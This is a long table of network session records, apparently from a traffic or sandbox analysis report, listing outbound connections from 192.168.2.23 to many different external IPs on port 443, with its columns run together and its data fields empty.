                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14402192.168.2.2360476184.249.215.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14403192.168.2.233554265.195.16.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14404192.168.2.233835863.172.47.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14405192.168.2.234180043.254.151.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14406192.168.2.235047697.171.68.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14407192.168.2.2351166150.145.147.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14408192.168.2.234467062.219.174.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14409192.168.2.2335238216.63.17.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14410192.168.2.235471489.188.204.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14411192.168.2.235619814.117.223.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14412192.168.2.234075450.238.216.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14413192.168.2.234310619.180.32.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14414192.168.2.2358146178.242.13.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14415192.168.2.2351102120.234.183.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14416192.168.2.2341396200.229.240.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14417192.168.2.235219473.111.236.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14418192.168.2.234341493.15.70.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14419192.168.2.233600437.179.189.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14420192.168.2.2354410156.111.156.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14421192.168.2.233339217.68.4.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14422192.168.2.235271650.119.127.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14423192.168.2.2337278182.7.64.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14424192.168.2.235850477.127.150.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14425192.168.2.2336992103.21.83.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14426192.168.2.2345690159.236.242.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14427192.168.2.2346996184.148.71.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14428192.168.2.235446234.199.76.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14429192.168.2.235195443.163.202.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14430192.168.2.2360692157.86.98.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14431192.168.2.2346916149.149.22.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14432192.168.2.2344522219.144.141.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14433192.168.2.235357054.224.200.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14434192.168.2.2355508133.209.196.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14435192.168.2.2356386183.68.22.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14436192.168.2.2343108120.125.70.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14437192.168.2.2353854193.99.131.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14438192.168.2.2344606132.145.65.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14439192.168.2.235560446.44.64.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14440192.168.2.23472805.31.206.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14441192.168.2.235541852.247.51.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14442192.168.2.2360336161.239.221.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14443192.168.2.2333452102.242.9.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14444192.168.2.2348692138.92.31.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14445192.168.2.2339088194.31.183.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14446192.168.2.2359128152.201.104.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14447192.168.2.233671238.77.231.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14448192.168.2.2342162109.151.177.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14449192.168.2.2347986222.65.240.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14450192.168.2.235564035.59.72.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14451192.168.2.2354028156.189.157.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14452192.168.2.2346442197.165.90.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14453192.168.2.233412674.39.105.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14454192.168.2.234635699.117.244.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14455192.168.2.2360536174.233.241.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14456192.168.2.236084058.207.184.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14457192.168.2.234456432.116.117.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14458192.168.2.2359498115.148.111.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14459192.168.2.2343110139.189.79.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14460192.168.2.2355322150.40.149.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14461192.168.2.2358732152.68.61.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14462192.168.2.235004243.135.168.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14463192.168.2.2340214117.225.178.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14464192.168.2.2336562177.149.13.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14465192.168.2.2346478189.33.62.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14466192.168.2.2358768120.85.140.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14467192.168.2.234079025.17.1.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14468192.168.2.2345584158.35.114.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14469192.168.2.235920862.93.134.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14470192.168.2.2360938195.87.175.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14471192.168.2.2347964158.176.118.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14472192.168.2.2333728110.249.133.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14473192.168.2.234721435.213.128.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14474192.168.2.233974675.165.245.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14475192.168.2.2335992109.214.153.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14476192.168.2.2360436150.119.34.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14477192.168.2.2349176204.194.69.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14478192.168.2.2339736188.71.181.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14479192.168.2.235941488.22.2.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14480192.168.2.235194854.22.92.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14481192.168.2.234620019.109.101.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14482192.168.2.234942635.43.239.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14483192.168.2.235180283.148.176.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14484192.168.2.234643876.175.36.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14485192.168.2.235215443.28.69.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14486192.168.2.2350808105.53.241.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14487192.168.2.2345932113.103.8.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14488192.168.2.2347028220.144.110.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14489192.168.2.2343718212.195.137.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14490192.168.2.235839464.14.36.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14491192.168.2.234132261.191.144.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14492192.168.2.2345472167.139.134.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14493192.168.2.2352866188.53.46.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14494192.168.2.2348676118.221.3.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14495192.168.2.2360664173.127.252.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14496192.168.2.235139877.102.185.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14497192.168.2.233549268.130.205.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14498192.168.2.2353256135.10.213.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14499192.168.2.2355322160.47.186.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14500192.168.2.2341990131.243.18.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14501192.168.2.2351820179.249.230.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14502192.168.2.235768648.81.130.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14503192.168.2.2348838212.139.207.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14504192.168.2.2353120196.17.161.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14505192.168.2.2342082114.153.205.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14506192.168.2.236087076.185.99.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14507192.168.2.2358862128.135.165.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14508192.168.2.235721836.68.104.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14509192.168.2.2355802203.104.70.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14510192.168.2.233707439.219.37.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14511192.168.2.2359040202.234.2.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14512192.168.2.2352160164.238.153.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14513192.168.2.233948685.163.228.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14514192.168.2.2357296151.52.83.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14515192.168.2.2350142132.27.244.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14516192.168.2.2352520140.230.171.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14517192.168.2.234394252.250.166.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14518192.168.2.23482481.149.176.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14519192.168.2.234197642.190.235.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14520192.168.2.235124097.223.20.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14521192.168.2.2348356150.118.102.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14522192.168.2.23350129.227.125.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14523192.168.2.2341960168.196.145.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14524192.168.2.234513477.202.191.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14525192.168.2.2348890133.183.222.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14526192.168.2.2343122175.77.23.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14527192.168.2.2335282220.237.60.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14528192.168.2.2334040160.160.189.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14529192.168.2.235941051.26.134.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14530192.168.2.234536257.16.248.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14531192.168.2.2355644216.118.108.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14532192.168.2.235118698.125.187.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14533192.168.2.234530623.188.111.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14534192.168.2.234180488.101.119.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14535192.168.2.2350030106.195.173.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14536192.168.2.2355732203.121.181.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14537192.168.2.235139625.43.162.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14538192.168.2.233361869.108.254.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14539192.168.2.234295448.133.67.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14540192.168.2.2341674154.198.185.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14541192.168.2.2351446204.73.234.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14542192.168.2.2354900213.108.197.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14543192.168.2.2335098168.134.243.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14544192.168.2.2347188137.118.241.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14545192.168.2.2332790181.162.242.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14546192.168.2.234850034.188.102.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14547192.168.2.2340466193.191.124.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14548192.168.2.233279490.239.121.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14549192.168.2.234018675.231.199.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14550192.168.2.2334560136.144.2.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14551192.168.2.2336808166.195.99.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14552192.168.2.235090293.97.141.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14553192.168.2.2337890105.147.41.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14554192.168.2.2359884164.170.46.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14555192.168.2.2337496221.143.145.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14556192.168.2.233518675.22.140.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14557192.168.2.2348220213.66.208.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14558192.168.2.235299669.253.102.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14559192.168.2.2357584118.163.30.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14560192.168.2.2345572133.154.52.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14561192.168.2.2348312210.164.57.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14562192.168.2.2352832136.142.50.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14563192.168.2.2339728131.15.28.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14564192.168.2.235465694.200.179.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14565192.168.2.2350586128.215.26.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14566192.168.2.2342916144.66.198.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14567192.168.2.2356642105.165.202.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14568192.168.2.2355018218.78.216.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14569192.168.2.2346560140.131.37.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14570192.168.2.234285695.38.22.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14571192.168.2.2341288133.179.184.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14572192.168.2.2351602133.63.10.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14573192.168.2.2347928217.163.82.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14574192.168.2.235057473.22.212.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14575192.168.2.2345484189.100.50.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14576192.168.2.235763467.7.218.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14577192.168.2.2334512132.204.48.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14578192.168.2.2355804110.22.110.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14579192.168.2.233999891.7.198.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14580192.168.2.2337534213.163.136.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14581192.168.2.2359834142.140.10.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14582192.168.2.233443857.91.25.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14583192.168.2.2337598101.12.146.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14584192.168.2.233330035.63.218.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14585192.168.2.23450644.116.86.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14586192.168.2.2339524196.79.243.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14587192.168.2.2358016211.87.211.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14588192.168.2.2348602159.44.135.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14589192.168.2.2336336221.14.187.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14590192.168.2.234564034.237.66.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14591192.168.2.2343014175.205.71.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14592192.168.2.2344168118.64.165.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14593192.168.2.2346330172.109.132.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14594192.168.2.236069294.30.230.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14595192.168.2.234548081.141.150.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14596192.168.2.2340506121.12.243.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14597192.168.2.2344726122.231.175.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14598192.168.2.235027478.139.18.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14599192.168.2.2357924123.141.233.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14600192.168.2.2352770184.179.100.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14601192.168.2.2337306137.93.77.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14602192.168.2.234166476.171.156.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14603192.168.2.235270853.69.148.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14604192.168.2.2357784206.160.207.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14605192.168.2.2348198180.29.151.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14606192.168.2.2353170117.56.173.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14607192.168.2.234838092.87.233.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14608192.168.2.233710641.193.58.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14609192.168.2.235438677.79.148.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14610192.168.2.235992452.111.67.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14611192.168.2.2340156110.197.41.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14612192.168.2.235746817.50.166.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14613192.168.2.2356238128.21.119.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14614192.168.2.23526909.232.173.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14615192.168.2.2336220165.65.91.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14616192.168.2.2344628183.194.137.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14617192.168.2.234081249.227.95.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14618192.168.2.236082669.78.251.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14619192.168.2.235197017.213.90.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14620192.168.2.235551478.184.16.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14621192.168.2.2336818190.76.175.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14622192.168.2.2351190208.250.225.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
